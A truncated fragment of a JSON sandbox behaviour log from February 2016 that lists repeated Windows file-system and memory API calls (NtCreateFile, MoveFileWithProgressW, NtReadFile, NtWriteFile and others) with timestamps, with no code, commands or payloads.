{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,792", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,842", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,883", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,893", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,893", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,903", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,903", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,023", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,023", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,053", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", 